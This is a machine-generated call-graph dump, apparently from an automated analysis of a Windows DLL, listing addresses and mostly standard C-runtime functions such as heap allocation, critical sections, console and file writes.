5976 22321c9d 5870->5976 5872 22321655 lstrcatW lstrlenW 5873 22321678 5872->5873 5874 22321693 ___scrt_fastfail 5873->5874 5875 2232167e lstrcatW 5873->5875 5874->5826 5875->5874 5891 22324793 5876->5891 5879 2232478f 5879->5860 5880 22324765 5897 22322ada 5880->5897 5886 223256d0 _abort 5881->5886 5882 2232570e 5910 22326368 5882->5910 5884 223256f9 RtlAllocateHeap 5885 2232570c 5884->5885 5884->5886 5885->5860 5886->5882 5886->5884 5887 2232474f _abort 7 API calls 5886->5887 5887->5886 5890 223235f2 RaiseException 5888->5890 5890->5863 5892 2232479f ___scrt_is_nonwritable_in_current_image 5891->5892 5904 22325671 RtlEnterCriticalSection 5892->5904 5894 223247aa 5905 223247dc 5894->5905 5896 223247d1 _abort 5896->5880 5898 22322ae3 5897->5898 5899 22322ae5 IsProcessorFeaturePresent 5897->5899 5898->5879 5901 22322b58 5899->5901 5909 22322b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5901->5909 5903 22322c3b 5903->5879 5904->5894 5908 223256b9 RtlLeaveCriticalSection 5905->5908 5907 223247e3 5907->5896 5908->5907 5909->5903 5913 22325b7a GetLastError 5910->5913 5914 22325b93 5913->5914 5915 22325b99 5913->5915 5932 22325e08 5914->5932 5919 22325bf0 SetLastError 5915->5919 5939 2232637b 5915->5939 5921 22325bf9 5919->5921 5920 22325bb3 5946 2232571e 5920->5946 5921->5885 5925 22325bb9 5928 22325be7 SetLastError 5925->5928 5926 22325bcf 5959 2232593c 5926->5959 5928->5921 5930 2232571e _free 17 API calls 5931 22325be0 5930->5931 5931->5919 5931->5928 5964 22325c45 5932->5964 5934 22325e2f 5935 22325e47 TlsGetValue 5934->5935 5938 22325e3b 5934->5938 5935->5938 5936 22322ada _ValidateLocalCookies 5 API calls 5937 22325e58 5936->5937 5937->5915 5938->5936 5945 22326388 _abort 5939->5945 5940 223263c8 5942 22326368 _free 19 API calls 5940->5942 5941 223263b3 RtlAllocateHeap 5943 22325bab 5941->5943 5941->5945 5942->5943 5943->5920 5952 22325e5e 5943->5952 5944 2232474f _abort 7 API calls 5944->5945 5945->5940 5945->5941 5945->5944 5947 22325752 _free 5946->5947 5948 22325729 HeapFree 5946->5948 5947->5925 5948->5947 5949 2232573e 5948->5949 5950 22326368 _free 18 API calls 5949->5950 5951 22325744 GetLastError 5950->5951 5951->5947 5953 22325c45 _abort 5 API calls 5952->5953 5954 22325e85 5953->5954 5955 22325ea0 TlsSetValue 5954->5955 5956 22325e94 5954->5956 5955->5956 5957 22322ada _ValidateLocalCookies 5 API calls 5956->5957 5958 22325bc8 5957->5958 5958->5920 5958->5926 5970 22325914 5959->5970 5967 22325c71 5964->5967 5969 22325c75 __crt_fast_encode_pointer 5964->5969 5965 22325c95 5968 22325ca1 GetProcAddress 5965->5968 5965->5969 5966 22325ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5966->5967 5967->5965 5967->5966 5967->5969 5968->5969 5969->5934 5971 22325854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 5970->5971 5972 22325938 5971->5972 5973 223258c4 5972->5973 5974 22325758 _abort 20 API calls 5973->5974 5975 223258e8 5974->5975 5975->5930 5977 22321ca6 _strlen 5976->5977 5977->5872 7575 223220db 7578 223220e7 ___scrt_is_nonwritable_in_current_image 7575->7578 7576 223220f6 7577 22322110 dllmain_raw 7577->7576 7579 2232212a 7577->7579 7578->7576 7578->7577 7583 2232210b 7578->7583 7588 22321eec 7579->7588 7581 22322177 7581->7576 7582 22321eec 31 API calls 7581->7582 7584 2232218a 7582->7584 7583->7576 7583->7581 7585 22321eec 31 API calls 7583->7585 7584->7576 7586 22322193 dllmain_raw 7584->7586 7587 2232216d dllmain_raw 7585->7587 7586->7576 7587->7581 7589 22321ef7 7588->7589 7590 22321f2a dllmain_crt_process_detach 7588->7590 7591 22321f1c dllmain_crt_process_attach 7589->7591 7592 22321efc 7589->7592 7597 22321f06 7590->7597 7591->7597 7593 22321f12 7592->7593 7594 22321f01 7592->7594 7603 223223ec 7593->7603 7594->7597 7598 2232240b 7594->7598 7597->7583 7611 223253e5 7598->7611 7704 22323513 7603->7704 7606 223223f5 7606->7597 7609 22322408 7609->7597 7610 2232351e 7 API calls 7610->7606 7617 22325aca 7611->7617 7614 2232351e 7693 22323820 7614->7693 7616 22322415 7616->7597 7618 22325ad4 7617->7618 7621 22322410 7617->7621 7619 22325e08 _abort 11 API calls 7618->7619 7620 22325adb 7619->7620 7620->7621 7622 22325e5e _abort 11 API calls 7620->7622 7621->7614 7623 22325aee 7622->7623 7625 223259b5 7623->7625 7626 223259d0 7625->7626 7627 223259c0 7625->7627 7626->7621 7631 223259d6 7627->7631 7630 2232571e _free 20 API calls 7630->7626 7632 223259ef 7631->7632 7633 223259e9 7631->7633 7635 2232571e _free 20 API calls 7632->7635 7634 2232571e _free 20 API calls 7633->7634 7634->7632 7636 223259fb 7635->7636 7637 2232571e _free 20 API calls 7636->7637 7638 22325a06 7637->7638 7639 2232571e _free 20 API calls 7638->7639 7640 22325a11 7639->7640 7641 2232571e _free 20 API calls 7640->7641 7642 22325a1c 7641->7642 7643 2232571e _free 20 API calls 7642->7643 7644 22325a27 7643->7644 7645 2232571e _free 20 API calls 7644->7645 7646 22325a32 7645->7646 7647 2232571e _free 20 API calls 7646->7647 7648 22325a3d 7647->7648 7649 2232571e _free 20 API calls 7648->7649 7650 22325a48 7649->7650 7651 2232571e _free 20 API calls 7650->7651 7652 22325a56 7651->7652 7657 2232589c 7652->7657 7663 223257a8 7657->7663 7659 223258c0 7660 223258ec 7659->7660 7676 22325809 7660->7676 7662 22325910 7662->7630 7664 223257b4 ___scrt_is_nonwritable_in_current_image 7663->7664 7671 22325671 RtlEnterCriticalSection 7664->7671 7666 223257be 7669 2232571e _free 20 API calls 7666->7669 7670 223257e8 7666->7670 7668 223257f5 _abort 7668->7659 7669->7670 7672 223257fd 7670->7672 7671->7666 7675 223256b9 RtlLeaveCriticalSection 7672->7675 7674 22325807 7674->7668 7675->7674 7677 22325815 ___scrt_is_nonwritable_in_current_image 7676->7677 7684 22325671 RtlEnterCriticalSection 7677->7684 7679 2232581f 7685 22325a7f 7679->7685 7681 22325832 7689 22325848 7681->7689 7683 22325840 _abort 7683->7662 7684->7679 7686 22325a8e __fassign 7685->7686 7688 22325ab5 __fassign 7685->7688 7687 22327cc2 __fassign 20 API calls 7686->7687 7686->7688 7687->7688 7688->7681 7692 223256b9 RtlLeaveCriticalSection 7689->7692 7691 22325852 7691->7683 7692->7691 7694 2232384b ___vcrt_freefls@4 7693->7694 7695 2232382d 7693->7695 7694->7616 7698 2232383b 7695->7698 7699 22323b67 7695->7699 7697 22323ba2 ___vcrt_FlsSetValue 6 API calls 7697->7694 7698->7697 7700 22323a82 try_get_function 5 API calls 7699->7700 7701 22323b81 7700->7701 7702 22323b99 TlsGetValue 7701->7702 7703 22323b8d 7701->7703 7702->7703 7703->7698 7710 22323856 7704->7710 7706 223223f1 7706->7606 7707 223253da 7706->7707 7708 22325b7a _abort 20 API calls 7707->7708 7709 223223fd 7708->7709 7709->7609 7709->7610 7711 22323862 GetLastError 7710->7711 7712 2232385f 7710->7712 7713 22323b67 ___vcrt_FlsGetValue 6 API calls 7711->7713 7712->7706 7714 22323877 7713->7714 7715 223238dc SetLastError 7714->7715 7716 22323ba2 ___vcrt_FlsSetValue 6 API calls 7714->7716 7721 22323896 7714->7721 7715->7706 7717 22323890 7716->7717 7718 223238b8 7717->7718 7720 22323ba2 ___vcrt_FlsSetValue 6 API calls 7717->7720 7717->7721 7719 22323ba2 ___vcrt_FlsSetValue 6 API calls 7718->7719 7718->7721 7719->7721 7720->7718 7721->7715 6339 22322418 6341 22322420 ___scrt_release_startup_lock 6339->6341 6343 223247f5 6341->6343 6342 22322448 6344 22324804 6343->6344 6345 22324808 6343->6345 6344->6342 6348 22324815 6345->6348 6349 22325b7a _abort 20 API calls 6348->6349 6352 2232482c 6349->6352 6350 22322ada _ValidateLocalCookies 5 API calls 6351 22324811 6350->6351 6351->6342 6352->6350 6353 2232281c 6356 22322882 6353->6356 6359 22323550 6356->6359 6358 2232282a 6360 2232358a 6359->6360 6361 2232355d 6359->6361 6360->6358 6361->6360 6362 223247e5 ___std_exception_copy 21 API calls 6361->6362 6363 2232357a 6362->6363 6363->6360 6365 2232544d 6363->6365 6366 2232545a 6365->6366 6367 22325468 6365->6367 6366->6367 6372 2232547f 6366->6372 6368 22326368 _free 20 API calls 6367->6368 6369 22325470 6368->6369 6370 223262ac _abort 26 API calls 6369->6370 6371 2232547a 6370->6371 6371->6360 6372->6371 6373 22326368 _free 20 API calls 6372->6373 6373->6369 7722 22324bdd 7723 22324c08 7722->7723 7724 22324bec 7722->7724 7725 22326d60 51 API calls 7723->7725 7724->7723 7726 22324bf2 7724->7726 7727 22324c0f GetModuleFileNameA 7725->7727 7728 22326368 _free 20 API calls 7726->7728 7729 22324c33 7727->7729 7730 22324bf7 7728->7730 7745 22324d01 7729->7745 7731 223262ac _abort 26 API calls 7730->7731 7733 22324c01 7731->7733 7735 22324e76 20 API calls 7736 22324c5d 7735->7736 7737 22324c72 7736->7737 7738 22324c66 7736->7738 7740 22324d01 38 API calls 7737->7740 7739 22326368 _free 20 API calls 7738->7739 7744 22324c6b 7739->7744 7741 22324c88 7740->7741 7743 2232571e _free 20 API calls 7741->7743 7741->7744 7742 2232571e _free 20 API calls 7742->7733 7743->7744 7744->7742 7747 22324d26 7745->7747 7749 22324d86 7747->7749 7751 223270eb 7747->7751 7748 22324c50 7748->7735 7749->7748 7750 223270eb 38 API calls 7749->7750 7750->7749 7754 22327092 7751->7754 7755 223254a7 __fassign 38 API calls 7754->7755 7756 223270a6 7755->7756 7756->7747 6374 22325303 6377 223250a5 6374->6377 6386 2232502f 6377->6386 6380 2232502f 5 API calls 6381 223250c3 6380->6381 6390 22325000 6381->6390 6384 22325000 20 API calls 6385 223250d9 6384->6385 6387 22325048 6386->6387 6388 22322ada _ValidateLocalCookies 5 API calls 6387->6388 6389 22325069 6388->6389 6389->6380 6391 2232502a 6390->6391 6392 2232500d 6390->6392 6391->6384 6393 22325024 6392->6393 6394 2232571e _free 20 API calls 6392->6394 6395 2232571e _free 20 API calls 6393->6395 6394->6392 6395->6391 6396 22327103 GetCommandLineA GetCommandLineW 6494 2232af43 6495 2232af59 6494->6495 6496 2232af4d 6494->6496 6496->6495 6497 2232af52 CloseHandle 6496->6497 6497->6495 6498 22328640 6501 22328657 6498->6501 6502 22328665 6501->6502 6503 22328679 6501->6503 6504 22326368 _free 20 API calls 6502->6504 6505 22328693 6503->6505 6506 22328681 6503->6506 6507 2232866a 6504->6507 6512 22328652 6505->6512 6514 223254a7 6505->6514 6508 22326368 _free 20 API calls 6506->6508 6510 223262ac _abort 26 API calls 6507->6510 6511 22328686 6508->6511 6510->6512 6513 223262ac _abort 26 API calls 6511->6513 6513->6512 6515 223254c4 6514->6515 6516 223254ba 6514->6516 6515->6516 6517 22325af6 _abort 38 API calls 6515->6517 6516->6512 6518 223254e5 6517->6518 6522 22327a00 6518->6522 6523 22327a13 6522->6523 6524 223254fe 6522->6524 6523->6524 6530 22327f0f 6523->6530 6526 22327a2d 6524->6526 6527 22327a40 6526->6527 6528 22327a55 6526->6528 6527->6528 6665 22326d7e 6527->6665 6528->6516 6531 22327f1b ___scrt_is_nonwritable_in_current_image 6530->6531 6532 22325af6 _abort 38 API calls 6531->6532 6533 22327f24 6532->6533 6534 22327f72 _abort 6533->6534 6542 22325671 RtlEnterCriticalSection 6533->6542 6534->6524 6536 22327f42 6543 22327f86 6536->6543 6541 223255a8 _abort 38 API calls 6541->6534 6542->6536 6544 22327f56 6543->6544 6545 22327f94 __fassign 6543->6545 6547 22327f75 6544->6547 6545->6544 6550 22327cc2 6545->6550 6664 223256b9 RtlLeaveCriticalSection 6547->6664 6549 22327f69 6549->6534 6549->6541 6551 22327d42 6550->6551 6554 22327cd8 6550->6554 6552 22327d90 6551->6552 6555 2232571e _free 20 API calls 6551->6555 6618 22327e35 6552->6618 6554->6551 6556 22327d0b 6554->6556 6561 2232571e _free 20 API calls 6554->6561 6557 22327d64 6555->6557 6558 22327d2d 6556->6558 6566 2232571e _free 20 API calls 6556->6566 6559 2232571e _free 20 API calls 6557->6559 6560 2232571e _free 20 API calls 6558->6560 6562 22327d77 6559->6562 6563 22327d37 6560->6563 6565 22327d00 6561->6565 6567 2232571e _free 20 API calls 6562->6567 6568 2232571e _free 20 API calls 6563->6568 6564 22327dfe 6569 2232571e _free 20 API calls 6564->6569 6578 223290ba 6565->6578 6571 22327d22 6566->6571 6572 22327d85 6567->6572 6568->6551 6573 22327e04 6569->6573 6606 223291b8 6571->6606 6576 2232571e _free 20 API calls 6572->6576 6573->6544 6574 22327d9e 6574->6564 6577 2232571e 20 API calls _free 6574->6577 6576->6552 6577->6574 6579 223290cb 6578->6579 6605 223291b4 6578->6605 6580 223290dc 6579->6580 6581 2232571e _free 20 API calls 6579->6581 6582 223290ee 6580->6582 6583 2232571e _free 20 API calls 6580->6583 6581->6580 6584 22329100 6582->6584 6585 2232571e _free 20 API calls 6582->6585 6583->6582 6586 22329112 6584->6586 6587 2232571e _free 20 API calls 6584->6587 6585->6584 6588 22329124 6586->6588 6589 2232571e _free 20 API calls 6586->6589 6587->6586 6590 22329136 6588->6590 6591 2232571e _free 20 API calls 6588->6591 6589->6588 6592 22329148 6590->6592 6593 2232571e _free 20 API calls 6590->6593 6591->6590 6594 2232915a 6592->6594 6595 2232571e _free 20 API calls 6592->6595 6593->6592 6596 2232571e _free 20 API calls 6594->6596 6600 2232916c 6594->6600 6595->6594 6596->6600 6597 2232917e 6599 22329190 6597->6599 6601 2232571e _free 20 API calls 6597->6601 6598 2232571e _free 20 API calls 6598->6597 6602 223291a2 6599->6602 6603 2232571e _free 20 API calls 6599->6603 6600->6597 6600->6598 6601->6599 6604 2232571e _free 20 API calls 6602->6604 6602->6605 6603->6602 6604->6605 6605->6556 6607 223291c5 6606->6607 6608 2232921d 6606->6608 6609 223291d5 6607->6609 6611 2232571e _free 20 API calls 6607->6611 6608->6558 6610 223291e7 6609->6610 6612 2232571e _free 20 API calls 6609->6612 6613 223291f9 6610->6613 6614 2232571e _free 20 API calls 6610->6614 6611->6609 6612->6610 6615 2232920b 6613->6615 6616 2232571e _free 20 API calls 6613->6616 6614->6613 6615->6608 6617 2232571e _free 20 API calls 6615->6617 6616->6615 6617->6608 6619 22327e42 6618->6619 6623 22327e60 6618->6623 6619->6623 6624 2232925d 6619->6624 6622 2232571e _free 20 API calls 6622->6623 6623->6574 6625 22327e5a 6624->6625 6626 2232926e 6624->6626 6625->6622 6660 22329221 6626->6660 6629 22329221 __fassign 20 API calls 6630 22329281 6629->6630 6631 22329221 __fassign 20 API calls 6630->6631 6632 2232928c 6631->6632 6633 22329221 __fassign 20 API calls 6632->6633 6634 22329297 6633->6634 6635 22329221 __fassign 20 API calls 6634->6635 6636 223292a5 6635->6636 6637 2232571e _free 20 API calls 6636->6637 6638 223292b0 6637->6638 6639 2232571e _free 20 API calls 6638->6639 6640 223292bb 6639->6640 6641 2232571e _free 20 API calls 6640->6641 6642 223292c6 6641->6642 6643 22329221 __fassign 20 API calls 6642->6643 6644 223292d4 6643->6644 6645 22329221 __fassign 20 API calls 6644->6645 6646 223292e2 6645->6646 6647 22329221 __fassign 20 API calls 6646->6647 6648 223292f3 6647->6648 6649 22329221 __fassign 20 API calls 6648->6649 6650 22329301 6649->6650 6651 22329221 __fassign 20 API calls 6650->6651 6652 2232930f 6651->6652 6653 2232571e _free 20 API calls 6652->6653 6654 2232931a 6653->6654 6655 2232571e _free 20 API calls 6654->6655 6656 22329325 6655->6656 6657 2232571e _free 20 API calls 6656->6657 6658 22329330 6657->6658 6659 2232571e _free 20 API calls 6658->6659 6659->6625 6661 22329258 6660->6661 6662 22329248 6660->6662 6661->6629 6662->6661 6663 2232571e _free 20 API calls 6662->6663 6663->6662 6664->6549 6666 22326d8a ___scrt_is_nonwritable_in_current_image 6665->6666 6667 22325af6 _abort 38 API calls 6666->6667 6668 22326d94 6667->6668 6671 22326e18 _abort 6668->6671 6672 223255a8 _abort 38 API calls 6668->6672 6673 2232571e _free 20 API calls 6668->6673 6674 22325671 RtlEnterCriticalSection 6668->6674 6675 22326e0f 6668->6675 6671->6528 6672->6668 6673->6668 6674->6668 6678 223256b9 RtlLeaveCriticalSection 6675->6678 6677 22326e16 6677->6668 6678->6677 7232 22327a80 7233 22327a8d 7232->7233 7234 2232637b _abort 20 API calls 7233->7234 7235 22327aa7 7234->7235 7236 2232571e _free 20 API calls 7235->7236 7237 22327ab3 7236->7237 7238 2232637b _abort 20 API calls 7237->7238 7242 22327ad9 7237->7242 7239 22327acd 7238->7239 7241 2232571e _free 20 API calls 7239->7241 7240 22325eb7 11 API calls 7240->7242 7241->7242 7242->7240 7243 22327ae5 7242->7243 7757 2232a1c6 IsProcessorFeaturePresent 7758 22327bc7 7759 22327bd3 ___scrt_is_nonwritable_in_current_image 7758->7759 7760 22327c0a _abort 7759->7760 7766 22325671 RtlEnterCriticalSection 7759->7766 7762 22327be7 7763 22327f86 __fassign 20 API calls 7762->7763 7764 22327bf7 7763->7764 7767 22327c10 7764->7767 7766->7762 7770 223256b9 RtlLeaveCriticalSection 7767->7770 7769 22327c17 7769->7760 7770->7769 6679 2232a945 6683 2232a96d 6679->6683 6680 2232a9a5 6681 2232a997 6688 2232aa17 6681->6688 6682 2232a99e 6692 2232aa00 6682->6692 6683->6680 6683->6681 6683->6682 6689 2232aa20 6688->6689 6696 2232b19b 6689->6696 6693 2232aa20 6692->6693 6694 2232b19b __startOneArgErrorHandling 21 API calls 6693->6694 6695 2232a9a3 6694->6695 6697 2232b1da __startOneArgErrorHandling 6696->6697 6701 2232b25c __startOneArgErrorHandling 6697->6701 6706 2232b59e 6697->6706 6699 2232b286 6700 2232b8b2 __startOneArgErrorHandling 20 API calls 6699->6700 6702 2232b292 6699->6702 6700->6702 6701->6699 6703 223278a3 __startOneArgErrorHandling 5 API calls 6701->6703 6704 22322ada _ValidateLocalCookies 5 API calls 6702->6704 6703->6699 6705 2232a99c 6704->6705 6707 2232b5c1 __raise_exc RaiseException 6706->6707 6708 2232b5bc 6707->6708 6708->6701 6709 22325348 6710 22323529 ___vcrt_uninitialize 8 API calls 6709->6710 6711 2232534f 6710->6711 6712 22327b48 6722 22328ebf 6712->6722 6716 22327b55 6735 2232907c 6716->6735 6719 22327b7f 6720 2232571e _free 20 API calls 6719->6720 6721 22327b8a 6720->6721 6739 22328ec8 6722->6739 6724 22327b50 6725 22328fdc 6724->6725 6726 22328fe8 ___scrt_is_nonwritable_in_current_image 6725->6726 6759 22325671 RtlEnterCriticalSection 6726->6759 6728 2232905e 6773 22329073 6728->6773 6730 22328ff3 6730->6728 6732 22329032 RtlDeleteCriticalSection 6730->6732 6760 2232a09c 6730->6760 6731 2232906a _abort 6731->6716 6733 2232571e _free 20 API calls 6732->6733 6733->6730 6736 22329092 6735->6736 6738 22327b64 RtlDeleteCriticalSection 6735->6738 6737 2232571e _free 20 API calls 6736->6737 6736->6738 6737->6738 6738->6716 6738->6719 6740 22328ed4 ___scrt_is_nonwritable_in_current_image 6739->6740 6749 22325671 RtlEnterCriticalSection 6740->6749 6742 22328f77 6754 22328f97 6742->6754 6745 22328ee3 6745->6742 6748 22328e78 66 API calls 6745->6748 6750 22327b94 RtlEnterCriticalSection 6745->6750 6751 22328f6d 6745->6751 6747 22328f83 _abort 6747->6724 6748->6745 6749->6745 6750->6745 6757 22327ba8 RtlLeaveCriticalSection 6751->6757 6753 22328f75 6753->6745 6758 223256b9 RtlLeaveCriticalSection 6754->6758 6756 22328f9e 6756->6747 6757->6753 6758->6756 6759->6730 6761 2232a0a8 ___scrt_is_nonwritable_in_current_image 6760->6761 6762 2232a0b9 6761->6762 6763 2232a0ce 6761->6763 6764 22326368 _free 20 API calls 6762->6764 6772 2232a0c9 _abort 6763->6772 6776 22327b94 RtlEnterCriticalSection 6763->6776 6766 2232a0be 6764->6766 6768 223262ac _abort 26 API calls 6766->6768 6767 2232a0ea 6777 2232a026 6767->6777 6768->6772 6770 2232a0f5 6793 2232a112 6770->6793 6772->6730 7041 223256b9 RtlLeaveCriticalSection 6773->7041 6775 2232907a 6775->6731 6776->6767 6778 2232a033 6777->6778 6779 2232a048 6777->6779 6780 22326368 _free 20 API calls 6778->6780 6785 2232a043 6779->6785 6796 22328e12 6779->6796 6781 2232a038 6780->6781 6783 223262ac _abort 26 API calls 6781->6783 6783->6785 6785->6770 6786 2232907c 20 API calls 6787 2232a064 6786->6787 6802 22327a5a 6787->6802 6789 2232a06a 6809 2232adce 6789->6809 6792 2232571e _free 20 API calls 6792->6785 7040 22327ba8 RtlLeaveCriticalSection 6793->7040 6795 2232a11a 6795->6772 6797 22328e2a 6796->6797 6799 22328e26 6796->6799 6798 22327a5a 26 API calls 6797->6798 6797->6799 6800 22328e4a 6798->6800 6799->6786 6824 22329a22 6800->6824 6803 22327a66 6802->6803 6804 22327a7b 6802->6804 6805 22326368 _free 20 API calls 6803->6805 6804->6789 6806 22327a6b 6805->6806 6807 223262ac _abort 26 API calls 6806->6807 6808 22327a76 6807->6808 6808->6789 6810 2232adf2 6809->6810 6811 2232addd 6809->6811 6813 2232ae2d 6810->6813 6817 2232ae19 6810->6817 6812 22326355 __dosmaperr 20 API calls 6811->6812 6814 2232ade2 6812->6814 6815 22326355 __dosmaperr 20 API calls 6813->6815 6816 22326368 _free 20 API calls 6814->6816 6818 2232ae32 6815->6818 6821 2232a070 6816->6821 6997 2232ada6 6817->6997 6820 22326368 _free 20 API calls 6818->6820 6822 2232ae3a 6820->6822 6821->6785 6821->6792 6823 223262ac _abort 26 API calls 6822->6823 6823->6821 6825 22329a2e ___scrt_is_nonwritable_in_current_image 6824->6825 6826 22329a36 6825->6826 6827 22329a4e 6825->6827 6849 22326355 6826->6849 6828 22329aec 6827->6828 6832 22329a83 6827->6832 6830 22326355 __dosmaperr 20 API calls 6828->6830 6833 22329af1 6830->6833 6852 22328c7b RtlEnterCriticalSection 6832->6852 6836 22326368 _free 20 API calls 6833->6836 6834 22326368 _free 20 API calls 6837 22329a43 _abort 6834->6837 6839 22329af9 6836->6839 6837->6799 6838 22329a89 6840 22329aa5 6838->6840 6841 22329aba 6838->6841 6842 223262ac _abort 26 API calls 6839->6842 6843 22326368 _free 20 API calls 6840->6843 6853 22329b0d 6841->6853 6842->6837 6845 22329aaa 6843->6845 6847 22326355 __dosmaperr 20 API calls 6845->6847 6846 22329ab5 6904 22329ae4 6846->6904 6847->6846 6850 22325b7a _abort 20 API calls 6849->6850 6851 2232635a 6850->6851 6851->6834 6852->6838 6854 22329b34 6853->6854 6855 22329b3b 6853->6855 6859 22322ada _ValidateLocalCookies 5 API calls 6854->6859 6856 22329b5e 6855->6856 6857 22329b3f 6855->6857 6861 22329baf 6856->6861 6862 22329b92 6856->6862 6858 22326355 __dosmaperr 20 API calls 6857->6858 6860 22329b44 6858->6860 6863 22329d15 6859->6863 6864 22326368 _free 20 API calls 6860->6864 6865 22329bc5 6861->6865 6907 2232a00b 6861->6907 6866 22326355 __dosmaperr 20 API calls 6862->6866 6863->6846 6867 22329b4b 6864->6867 6910 223296b2 6865->6910 6870 22329b97 6866->6870 6871 223262ac _abort 26 API calls 6867->6871 6873 22326368 _free 20 API calls 6870->6873 6871->6854 6876 22329b9f 6873->6876 6874 22329bd3 6880 22329bd7 6874->6880 6881 22329bf9 6874->6881 6875 22329c0c 6878 22329c20 6875->6878 6879 22329c66 WriteFile 6875->6879 6877 223262ac _abort 26 API calls 6876->6877 6877->6854 6884 22329c56 6878->6884 6885 22329c28 6878->6885 6882 22329c89 GetLastError 6879->6882 6887 22329bef 6879->6887 6886 22329ccd 6880->6886 6917 22329645 6880->6917 6922 22329492 GetConsoleCP 6881->6922 6882->6887 6948 22329728 6884->6948 6888 22329c46 6885->6888 6889 22329c2d 6885->6889 6886->6854 6892 22326368 _free 20 API calls 6886->6892 6887->6854 6887->6886 6895 22329ca9 6887->6895 6940 223298f5 6888->6940 6889->6886 6933 22329807 6889->6933 6894 22329cf2 6892->6894 6897 22326355 __dosmaperr 20 API calls 6894->6897 6898 22329cb0 6895->6898 6899 22329cc4 6895->6899 6897->6854 6900 22326368 _free 20 API calls 6898->6900 6955 22326332 6899->6955 6902 22329cb5 6900->6902 6903 22326355 __dosmaperr 20 API calls 6902->6903 6903->6854 6996 22328c9e RtlLeaveCriticalSection 6904->6996 6906 22329aea 6906->6837 6960 22329f8d 6907->6960 6982 22328dbc 6910->6982 6912 223296c2 6913 223296c7 6912->6913 6914 22325af6 _abort 38 API calls 6912->6914 6913->6874 6913->6875 6915 223296ea 6914->6915 6915->6913 6916 22329708 GetConsoleMode 6915->6916 6916->6913 6919 2232966a 6917->6919 6921 2232969f 6917->6921 6918 223296a1 GetLastError 6918->6921 6919->6918 6920 2232a181 WriteConsoleW CreateFileW 6919->6920 6919->6921 6920->6919 6921->6887 6927 223294f5 6922->6927 6928 22329607 6922->6928 6923 22322ada _ValidateLocalCookies 5 API calls 6925 22329641 6923->6925 6925->6887 6926 223279e6 40 API calls __fassign 6926->6927 6927->6926 6927->6928 6929 2232957b WideCharToMultiByte 6927->6929 6932 223295d2 WriteFile 6927->6932 6991 22327c19 6927->6991 6928->6923 6929->6928 6930 223295a1 WriteFile 6929->6930 6930->6927 6931 2232962a GetLastError 6930->6931 6931->6928 6932->6927 6932->6931 6938 22329816 6933->6938 6934 223298d8 6935 22322ada _ValidateLocalCookies 5 API calls 6934->6935 6939 223298f1 6935->6939 6936 22329894 WriteFile 6937 223298da GetLastError 6936->6937 6936->6938 6937->6934 6938->6934 6938->6936 6939->6887 6947 22329904 6940->6947 6941 22329a0f 6942 22322ada _ValidateLocalCookies 5 API calls 6941->6942 6943 22329a1e 6942->6943 6943->6887 6944 22329986 WideCharToMultiByte 6945 22329a07 GetLastError 6944->6945 6946 223299bb WriteFile 6944->6946 6945->6941 6946->6945 6946->6947 6947->6941 6947->6944 6947->6946 6952 22329737 6948->6952 6949 223297ea 6951 22322ada _ValidateLocalCookies 5 API calls 6949->6951 6950 223297a9 WriteFile 6950->6952 6953 223297ec GetLastError 6950->6953 6954 22329803 6951->6954 6952->6949 6952->6950 6953->6949 6954->6887 6956 22326355 __dosmaperr 20 API calls 6955->6956 6957 2232633d _free 6956->6957 6958 22326368 _free 20 API calls 6957->6958 6959 22326350 6958->6959 6959->6854 6969 22328d52 6960->6969 6962 22329f9f 6963 22329fa7 6962->6963 6964 22329fb8 SetFilePointerEx 6962->6964 6965 22326368 _free 20 API calls 6963->6965 6966 22329fd0 GetLastError 6964->6966 6968 22329fac 6964->6968 6965->6968 6967 22326332 __dosmaperr 20 API calls 6966->6967 6967->6968 6968->6865 6970 22328d74 6969->6970 6971 22328d5f 6969->6971 6974 22326355 __dosmaperr 20 API calls 6970->6974 6976 22328d99 6970->6976 6972 22326355 __dosmaperr 20 API calls 6971->6972 6973 22328d64 6972->6973 6975 22326368 _free 20 API calls 6973->6975 6977 22328da4 6974->6977 6978 22328d6c 6975->6978 6976->6962 6979 22326368 _free 20 API calls 6977->6979 6978->6962 6980 22328dac 6979->6980 6981 223262ac _abort 26 API calls 6980->6981 6981->6978 6983 22328dc9 6982->6983 6985 22328dd6 6982->6985 6984 22326368 _free 20 API calls 6983->6984 6986 22328dce 6984->6986 6987 22328de2 6985->6987 6988 22326368 _free 20 API calls 6985->6988 6986->6912 6987->6912 6989 22328e03 6988->6989 6990 223262ac _abort 26 API calls 6989->6990 6990->6986 6992 22325af6 _abort 38 API calls 6991->6992 6993 22327c24 6992->6993 6994 22327a00 __fassign 38 API calls 6993->6994 6995 22327c34 6994->6995 6995->6927 6996->6906 7000 2232ad24 6997->7000 6999 2232adca 6999->6821 7001 2232ad30 ___scrt_is_nonwritable_in_current_image 7000->7001 7011 22328c7b RtlEnterCriticalSection 7001->7011 7003 2232ad3e 7004 2232ad70 7003->7004 7005 2232ad65 7003->7005 7007 22326368 _free 20 API calls 7004->7007 7012 2232ae4d 7005->7012 7008 2232ad6b 7007->7008 7027 2232ad9a 7008->7027 7010 2232ad8d _abort 7010->6999 7011->7003 7013 22328d52 26 API calls 7012->7013 7014 2232ae5d 7013->7014 7015 2232ae63 7014->7015 7017 2232ae95 7014->7017 7019 22328d52 26 API calls 7014->7019 7030 22328cc1 7015->7030 7017->7015 7020 22328d52 26 API calls 7017->7020 7023 2232ae8c 7019->7023 7021 2232aea1 CloseHandle 7020->7021 7021->7015 7024 2232aead GetLastError 7021->7024 7022 2232aedd 7022->7008 7026 22328d52 26 API calls 7023->7026 7024->7015 7025 22326332 __dosmaperr 20 API calls 7025->7022 7026->7017 7039 22328c9e RtlLeaveCriticalSection 7027->7039 7029 2232ada4 7029->7010 7031 22328cd0 7030->7031 7032 22328d37 7030->7032 7031->7032 7038 22328cfa 7031->7038 7033 22326368 _free 20 API calls 7032->7033 7034 22328d3c 7033->7034 7035 22326355 __dosmaperr 20 API calls 7034->7035 7036 22328d27 7035->7036 7036->7022 7036->7025 7037 22328d21 SetStdHandle 7037->7036 7038->7036 7038->7037 7039->7029 7040->6795 7041->6775 7042 22322049 7043 22322055 ___scrt_is_nonwritable_in_current_image 7042->7043 7044 223220d3 7043->7044 7045 2232207d 7043->7045 7055 2232205e 7043->7055 7046 22322639 ___scrt_fastfail 4 API calls 7044->7046 7056 2232244c 7045->7056 7048 223220da 7046->7048 7049 22322082 7065 22322308 7049->7065 7051 22322087 __RTC_Initialize 7068 223220c4 7051->7068 7053 2232209f 7071 